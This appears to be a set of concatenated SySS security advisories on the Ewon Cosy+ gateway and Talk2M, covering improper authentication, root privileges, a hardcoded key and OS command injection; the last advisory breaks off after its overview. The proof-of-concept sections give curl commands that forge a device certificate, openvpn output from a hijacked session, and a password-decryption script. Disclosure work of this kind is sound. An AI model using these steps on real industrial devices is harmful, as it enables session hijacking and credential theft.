During account assignment in the Talk2M platform, a Cosy+ device generates and sends a certificate signing request (CSR) to the back end. This CSR is then signed by the manufacturer and used for OpenVPN authentication by the device afterward. Since the common name (CN) of the certificate is specified by the device and used in order to assign the OpenVPN session to the corresponding Talk2M account, an attacker with root access to a Cosy+ device is able to manipulate the CSR and get correctly signed certificates for foreign devices.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-043  
Product:                   Ewon Cosy+ / Talk2M Remote Access Solution  
Manufacturer:              HMS Industrial Networks AB  
Affected Version(s):       N.A.  
Tested Version(s):         N.A.  
Vulnerability Type:        Improper Authentication (CWE-287)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-17  
Solution Date:             2024-04-18  
Public Disclosure:         2024-08-11  
CVE Reference:             CVE-2024-33897  
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

During account assignment in the Talk2M platform, a Cosy+ device  
generates and sends a certificate signing request (CSR) to the back end.  
This CSR is then signed by the manufacturer and used for OpenVPN  
authentication by the device afterward.

Since the common name (CN) of the certificate is specified by the device  
and used in order to assign the OpenVPN session to the corresponding  
Talk2M account, an attacker with root access to a Cosy+ device is able  
to manipulate the CSR and get correctly signed certificates for foreign  
devices.

Using these certificates for OpenVPN authentication results in hijacking  
the VPN session and allows for further attacks, e.g.:

- - Impacting the accessibility of the original device  
- - Attacking the Talk2M-connected user device via the VPN connection  
- - Eavesdropping and manipulating the network communication of connected  
   users

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Note: Since the X.509 client certificate of a Cosy+, which is used for  
       authentication against the Talk2M API, is handled by the hardware  
       security module (HSM), root access to a Cosy+ device is required.

1. Exporting the OpenSSL engine to use the hardware security module:

        $ export OPENSSL_CONF=/etc/ssl/se050_openssl.cnf  
    $ export EX_SSS_BOOT_SSS_PORT=/dev/i2c-0

2. Sending a self-created CSR to the Talk2M API:

      $ curl --path-as-is -i -s -k -X $'POST' \  
     -H $'Host: eu.device.talk2m.com' -H $'Accept: application/json' \  
     -H $'Content-Type: application/json' -H $'Ewon-Serial: 2403-0999-25' \  
     -H $'Device-State: AccountLinked' -H $'Content-Length: 768' \  
     --data-binary $'{\x0a\x09\"csr\":  
         \x09\"-----BEGIN CERTIFICATE REQUEST-----\\nMIIB6zCCAUwCAQAwgaY  
         xCzAJBgNVBAYTAkJFMRcwFQYDVQQIEw5CcmFiYW50IFdh\\nbGxvbjERMA8GA1U  
         EBxMITml2ZWxsZXMxIzAhBgNVBAoTGkhNUyBJbmR1c3RyaWFs\\nIE5ldHdvcmt  
         zIFNBMRAwDgYDVQQLEwdFd29uIEJVMRYwFAYDVQQDEw1EMjMwNy0w\\nMTAxLTI  
         1MRwwGgYJKoZIhvcNAQkBFg1pbmZvQGV3b24uYml6MIGbMBAGByqGSM49\\nAgE  
         GBSuBBAAjA4GGAAQBaUGPo1FIjOOqyd1M47M2fcLQ2MN3aj7wI8pBYmopdSEY\\  
         nKszktBPre3AZ74E4326+vUej6nBG/17SWNb+VZPEyXYBAvEyyvsXfy/UlnB6NX  
         aj\\n6rrmy2pqP5bKN/1yR3reqlA6+9rdYzcH3ESJvp9hTkZnV4qbdNjTtqSfZO  
         4zu1Zn\\nE+CgADAKBggqhkjOPQQDAgOBjAAwgYgCQgDVbJN5MJJZnkRRvNwwXu  
         6GrvILBN6H\\nxTwR3inwMxLf+a/o+SFiqq5Pvsm2UXebVSD3osopdnJ8cxzTzi  
         PopsLiXAJCAa5K\\n+0T0H8VAvBzKTQkpiHHzW9JkDvIDaJA4WtYzA+KT7jo4kW  
         vQIr7rBBOlILoofQzv\\nypCqHaugjHhdeuJecIiq\\n-----END CERTIFICAT  
         E REQUEST-----\\n\"\x0a}' \  
     $'https://eu.device.talk2m.com/certificates/csr' \  
     --cert /tmp/birth_key_crt.pem --key /tmp/birth_key_ref.pem

3. Requesting the signed certificate:

          $ curl -i -k -H $'Device-State: AccountLinked' \  
     https://device.talk2m.com/certificates/deviceCertificate  \  
     --cert birth_key_crt.pem --key birth_key_ref.pem

4. Talk2M response:

          HTTP/1.1 200  
     date: Tue, 16 Apr 2024 13:09:57 GMT  
     server: Apache  
     ewon-server-time: 1713272998  
     device-state: VpnProvisioned  
     content-type: application/json  
     transfer-encoding: chunked

          {"certificate":"-----BEGIN CERTIFICATE-----\nMIIDTjCCAjagAwIBA[...]  
     KsxyR8w==\n-----END CERTIFICATE-----"}

5. This signed certificate and the used key can be used for OpenVPN  
    authentication. The CN will be used to assign the session to the  
    corresponding Talk2M account. This also overwrites a potential  
    current VPN session of the original device:

     $ openvpn --config attacker.ovpn  
       Attempting to establish TCP connection with [AF_INET]51.195.79.69:443  
       TCP connection established with [AF_INET]51.195.79.69:443  
       TCPv4_CLIENT link remote: [AF_INET]51.195.79.69:443  
       VERIFY OK: depth=1, C=BE, ST=Brabant Wallon, L=Nivelles, O=eWON sa,  
         OU=Talk2M, CN=Talk2M Certification Authority,  
         emailAddress=itmanager@talk2m.com  
       VERIFY KU OK  
       Validating certificate extended key usage  
       ++ Certificate has EKU (str) TLS Web Server Authentication,  
         expects TLS Web Server Authentication  
       VERIFY EKU OK  
       VERIFY OK: depth=0, C=BE, ST=Brabant Wallon, L=Nivelles,  
         O=HMS Industrial Networks SA, OU=Talk2M, CN=server-device,  
         emailAddress=info@ewon.biz  
       Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384,  
         peer certificate: 2048 bit RSA, signature: RSA-SHA1  
       [server-device] Peer Connection Initiated with [AF_INET]51.195.79.69:443  
       TUN/TAP device tap0 opened  
       net_addr_ll_set: lladdr 00:03:27:d8:68:84 for tap0  
       TUN/TAP link layer address set to 00:03:27:d8:68:84  
       net_iface_mtu_set: mtu 1500 for tap0  
       net_iface_up: set tap0 up  
       net_addr_v4_add: 10.37.211.214/16 dev tap0  
       Data Channel: cipher 'AES-256-GCM', peer-id: 0, compression: 'lzo'  
       Timers: ping 10, ping-exit 40  
       Initialization Sequence Completed

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vulnerability was fixed in the back end by HMS on April 18, 2024.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-09: Potential vulnerability discovered  
2024-04-16: Call with the manufacturer and requested a Talk2M account  
             with an assigned device to verify the potential vulnerability  
2024-04-16: Manufacturer provided a Talk2M account with an assigned device  
2024-04-16: Vulnerability confirmed  
2024-04-16: Short update about the state sent to the manufacturer  
2024-04-16: Security advisory inculding technical details provided to  
             the manufacturer  
2024-04-18: Vulnerability fixed by the manufacturer  
2024-04-30: CVE ID CVE-2024-33897[5] assigned by the manufacturer  
2024-07-12: Manufacturer asked for reviewing the blog post draft  
2024-07-12: Confirmed reviewing the blog post is possible and asking for  
             the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post  
2024-07-24: Manufacturer also asked for an appointment to discuss the blog post  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website  
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-043  
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-043.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy  
[4] Manufacturer note  
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf  
[5] CVE-2024-33897  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33897  
[6] Blog post  
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[7] DEF CON talk  
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay47wACgkQrgyb+PE0  
i1O5RQ/9HM9YIPRLVqGSRNPYW45F9e1wj9uHTvt78XjRng5lbRPpgWAO1G6UVQvS  
ebugxzjAtGrdMxx8X1NHd9vbshyAHj/q33Y0fkQ5TB2hnSMkn2nbXTEZKIIS6wK0  
XnJhB31iVnkgMeNFQ0SwSutBnnxJ7mvQ6vUBG210DSHjpQtu8rWuCyrf3BcSCJ/I  
nT79b7TJOxOMD1y5VAeVP6Pehh+IlJgvSItXZyOjs4wgt/+z+wVoKnYdqSAHpovI  
/rjVbtp7cvIhQInghnDoRWfXce34bk07geOB4VGg7bhxGCeWbJZq/Dxrag5jJb9l  
0zx2K4M8ZTwFcrtAliFgyzrIgvjfOk9HCZasSMl20znj4+3QaAWpfn2oMmCQCaLg  
6hBqAQ+s66Cv8Br24WKdlnj3nrsn+SAX2TKDxajt+WiDkXKvsLPs8XCmzVN8jViK  
nN/dJ3chba4yhqmpft1wRXG71VvBdbv3pkLp7usKszUrul8M802JzF2aGTUsiKgQ  
QSxpNhSP4aC2jqjt1OpX7W6NKD1nIhg0VrduxlwlAcQ2uffbh8xtak1MgZry0/yP  
6j9a15DOTJshMeud8R3Bkfjms/0Jzm43uyjIeRGNP79UyohsTX4jOJAsUYr0efUZ  
/55N3HiCD94jYoee5E3sF1vWlrhVDzkWJ7Q8u/W4osSIwMNikTc=  
=JS3w  
-----END PGP SIGNATURE-----

Ewon Cosy+ / Talk2M Remote Access Solution Improper Authentication

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The Ewon Cosy+ executes all tasks and services in the context of the user "root" and therefore with the highest system privileges. By compromising a single service, attackers automatically gain full system access.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-033  
Product:                   Ewon Cosy+  
Manufacturer:              HMS Industrial Networks AB  
Affected Version(s):       Firmware Versions: all versions  
Tested Version(s):         Firmware Version: 21.2s7  
Vulnerability Type:        Execution with Unnecessary Privileges (CWE-250)  
Risk Level:                Low  
Solution Status:           Open  
Manufacturer Notification: 2024-04-10  
Solution Date:             Not yet fixed  
Public Disclosure:         2024-08-11  
CVE Reference:             CVE-2024-33894  
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Ewon Cosy+ executes all tasks and services in the context  
of the user "root" and therefore with the highest system privileges.

By compromising a single service, attackers automatically gain full  
system access.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Examining running processes:  
$> ps  
   PID USER       VSZ STAT COMMAND  
     1 root      6248 S    {systemd} /sbin/init  
     2 root         0 SW   [kthreadd]  
     3 root         0 IW   [kworker/0:0]  
     5 root         0 IW   [kworker/u2:0]  
     6 root         0 IW<  [mm_percpu_wq]  
     7 root         0 SW   [ksoftirqd/0]  
     8 root         0 RW   [rcu_sched]  
     9 root         0 IW   [rcu_bh]  
   205 root      3044 S    udevd --daemon  
   491 root     23344 S    /usr/lib/systemd/systemd-journald  
   505 root      3524 S    /usr/lib/systemd/systemd-udevd  
   530 root         0 IW   [kworker/u2:2]  
   536 root     11908 S    /usr/sbin/rngd -f -r /dev/hwrng  
   537 root     50364 S    /usr/sbin/ModemManager --log-journal  
   538 root      2232 S    /usr/sbin/klogd -n  
   539 root      2232 S    /usr/sbin/syslogd -n  
   542 root      3556 S    /sbin/agetty -o -p -- \u --noclear tty1 linux  
   547 root     22972 S    /usr/root/ewon/bin/modem-manager-handler  
   549 root     29860 R    /usr/root/ewon/bin/sysDSupervisor  
   555 root     21868 S    /usr/root/ewon/bin/sysUpdateManager  
   565 root      4760 S    /usr/lib/systemd/systemd-logind  
   623 root     52596 S    /usr/root/ewon/bin/ewon  
   742 root     14064 S    eveusbd -p  
   746 root     11696 S    /usr/sbin/chronyd -4 -n  
   790 root      2232 S    udhcpc --script=/usr/root/ewon/bin/bootpdhcp/dhcpc.s  
   853 root         0 IW<  [kworker/u3:3]  
   926 root         0 RW   [kworker/0:2]  
  1209 root         0 IW<  [kworker/0:0H]  
  1274 root         0 IW<  [kworker/0:2H]  
  1308 root      5004 S    openvpn --auth-nocache --config /var/run/openvpn.con  
  1315 root      2496 S    sh

     [...]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to the manufacturer, no fix is planned for the current device  
generation and it is on the roadmap for future generations.[7]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-04: Vulnerability discovered  
2024-04-10: Vulnerability reported to manufacturer  
2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for  
             a publication date for all findings  
2024-04-12: Proposed dates for a discussion about publication  
2024-04-19: Manufacturer sent a technical overview of the analysis;  
             a fix is planned for the next device generation  
2024-04-30: CVE ID CVE-2024-33894[4] assigned by the manufacturer  
2024-05-31: Manufacturer asked if the blog post[5] can be reviewed by HMS  
2024-06-04: Proposed dates to review the blog post draft  
2024-07-17: Blog post provided to HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post  
2024-07-24: Manufacturer also asked for an appointment to discuss the blog  
             post  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[6]  
2024-08-11: Blog post published[5]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website  
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-033  
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-033.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy  
[4] CVE-2024-33894  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33894  
[5] Blog post  
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[6] DEF CON talk  
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521  
[7] Manufacturer note  
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay45EACgkQrgyb+PE0  
i1P5LRAAg9gPOXRL6URvnvUSI9Tsrqr/sNXbEm6ZxnBjmOtrSACUqvL/3G1mg31M  
2zBXF/P4HnLgZPywO+XTI0F9QmwIhvGvksh/lvlMPt7sI9yk1Xt/UauSWYEEAqbT  
5wyq5i9K4ni9ehV0gnoBjwo+10wLpKOWn1sXBQkN93bGDexEJbxnxE/0/+3qjd1X  
WkzoZ6MvggSFTNJcF0XkHxjuvjCc8HHmto9TV8YjrzbmMvqPFVcVc/C8E5FkszFg  
SRUEfDaQMZgEcvXOeLOp/FkJwLIhp8yeGAseAy7ii5ZElmwELE7maE8/sxeCym9e  
f+ahwg0feHDFU1FYvY0s3sx6PJroy1K2wGS+JRXkHCC/Rn+gBkdOK+09u+GCBq3K  
+o8WYE92kLOjEYzdrkMh2/XAXVqFaBA7EzX49KLZjlFhwPL/AP2Se3Jne8G1HhNw  
jxmLHu1O1yBX28x6Je2COd0iNxIVgtg6skqIePZajMq1Gw9BOrzqO12IT+fr0ecO  
KlTs5zGsu1GhkmoGd2MZXuV0znty4UkTw1ozsNudwqftz6y3cwDmNKPSkSgmSr6a  
Ygwb0w10XncZruqZhabKLR7byfeLDiyRykQuOe3cYHmHW7X3N9wSqfzp6Bpn7bcx  
Qrr1dpzCn4LJRW14C3ZQD/KEjPVIHgZ+ZIkNjHGreG+mHKygTWA=  
=U9YV  
-----END PGP SIGNATURE-----

Ewon Cosy+ Excessive Access

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. Due to the use of a hardcoded cryptographic key, an attacker is able to decrypt encrypted data and retrieve sensitive information.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-032  
Product:                   Ewon Cosy+  
Manufacturer:              HMS Industrial Networks AB  
Affected Version(s):       Firmware Versions: < 21.2s10 and < 22.1s3  
Tested Version(s):         Firmware Version: 21.2s7  
Vulnerability Type:        Use of Hard-coded Cryptographic Key (CWE-321)  
Risk Level:                Medium  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-10  
Solution Date:             2024-07-18  
Public Disclosure:         2024-08-11  
CVE Reference:             CVE-2024-33895  
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

Due to the use of a hardcoded cryptographic key, an attacker is able to  
decrypt encrypted data and retrieve sensitive information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Ewon Cosy+ stores sensitive data such as passwords in an encrypted  
format.  
These values are included, e.g., in configuration backups.

However, a symmetric encryption algorithm (AES-CBC-256) with hardcoded  
and static cryptographic keys is used.  
Thus, an attacker is able to decrypt that data and retrieve sensitive  
information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By analyzing the ELF executable "ewon" of an Ewon Cosy+ in a disassembler  
and decompiler, e.g. Ghidra, the encryption mechanism could be reversed  
and the hardcoded cryptographic key could be extracted.

Used encryption algorithm: AES in CBC mode with a key length of 256 bit

A simple Python script was developed to decrypt encrypted values:

********************  
import base64  
import sys  
from Crypto.Cipher import AES  
from binascii import unhexlify

def pad(text):  
     padding_length = AES.block_size - (len(text) % AES.block_size)  
     padded_text = text + bytes([padding_length] * padding_length)  
     return padded_text, padding_length

encoded_text = sys.argv[1]

key_hex = "6367b0 [...]" # redacted  
iv_hex = "28c9 [...]" # redacted

key = unhexlify(key_hex)  
iv = unhexlify(iv_hex)

decoded_text = base64.b64decode(encoded_text[4:])  
padded_text, padding_length = pad(decoded_text)  
cipher = AES.new(key, AES.MODE_CBC, iv)  
decrypted_text = cipher.decrypt(padded_text)

print("Plaintext: {}".format(  
     decrypted_text[1:][:-padding_length-2].decode('utf-8')  
     ))  
****************

$> python3 decrypt_ewon_pwd.py "#_5_YARU3GSgNcElltjyMMqWfZwb"  
Plaintext: adm:123

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to the manufacturer note[4], the vulnerability was fixed  
with the firmware versions 21.2s10 and 22.1s3.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-04: Vulnerability discovered  
2024-04-10: Vulnerability reported to manufacturer  
2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for  
             a publication date for all findings  
2024-04-12: Proposed dates for a discussion about publication  
2024-04-19: Manufacturer sent a technical overview of planned remediation  
             actions and details about the planned timeline  
2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer  
2024-05-31: Manufacturer informed that the fix is in completion stage and  
             asked if the blog post[6] can be reviewed by HMS  
2024-06-04: Proposed dates to review the blog post draft  
2024-06-21: Inquiry about the status  
2024-06-21: Received an out-of-office auto reply  
2024-07-01: Inquiry about the status  
2024-07-04: Inquiry about the status  
2024-07-12: Inquiry about the status and letting the manufacturer know that  
             the vulnerability will be published within a talk at DEF CON[7]  
             in August  
2024-07-12: Manufacturer responded that the fix is planned by the end of  
             July; manufacturer asked again for reviewing the blog post  
             draft  
2024-07-12: Again confirmed reviewing the blog post is possible and asking  
             for the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post and confirmed that a  
             fix is provided  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website  
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-032  
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-032.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy  
[4] Manufacturer note  
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf  
[5] CVE-2024-33895  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33895  
[6] Blog post  
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[7] DEF CON talk  
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay420ACgkQrgyb+PE0  
i1NNyw/9GzNMWrKeghrwqgcJ01f8QJGo1L3ObWscyiMXxqne6Zo8VyIefvGY97hb  
fZisL4BrzmK+NioLeP3SzM879yGbzU5dca7g5Cqf0qJh9mdU/s6tkgdK+Duz3QdZ  
9XPV+ovSDGSDk953fVhHrKUdsns9hMnRIoMkfPxZUm+KWXRIwRguNxl2/q1xxgjt  
2kqTldwgwgekKXXp+Uwt5Z8LUG0dU7pHHb3OCizJ81tOCHjwuJA3aUmyBachl4Vc  
Nw7GwByxoKLTTEfj2CWtkfC4u9UXHUQJBDl51+qRPIVkG2g0jTSQ2AEIubtmi7IA  
jA/8PK5QONh0GHptj2LzeTqlcEX7834uIE0gHrR5pkFJvgUWoNueEZ9FIHRNZPLX  
9Lhu52uiKogX5BVYeRIkbHAxmgf/wojQ4AXE9BMvOgm0HSzjgIaVZ+cqNkMP1ey0  
uDXPllHkWtA1IBeffhiVrfc11fLJJczkpN3hRevoa4D6hlNvOYrVUAY869vrJkA2  
LHvFwLf1JDQaGiPCkglCcipjtXw+hqGE+zEYOWobXH4cIwdnPUG+VaAks9GcNEdN  
o6QVfnLTveo8e1u11z8ftguYthMbhOJxVWPBWJv6XhiCXEw8Gh/HonR6LfGQyRTe  
Fk+qtF1Mih2ZNKnW+XmHHCjtXGgiarfjExVFnhXHbrE8sOHv90I=  
=/d8q  
-----END PGP SIGNATURE-----

Ewon Cosy+ Hardcoded Key 

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. Due to improper neutralization of parameters read from a user-controlled configuration file, an authenticated attacker is able to inject and execute OS commands on the device.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-018  
Product:                   Ewon Cosy+  
Manufacturer:              HMS Industrial Networks AB  
Affected Version(s):       Firmware Versions: < 21.2s10 and < 22.1s3  
Tested Version(s):         Firmware Version: 21.2s7  
Vulnerability Type:        Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78)  
Risk Level:                Medium  
Solution Status:           Fixed  
Manufacturer Notification: 2024-03-27  
Solution Date:             2024-07-18  
Public Disclosure:         2024-08-11  
CVE Reference:             CVE-2024-33896  
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

Due to improper neutralization of parameters read from a user-controlled  
configuration file, an authenticated attacker is able to inject and execute  
OS commands on the device.

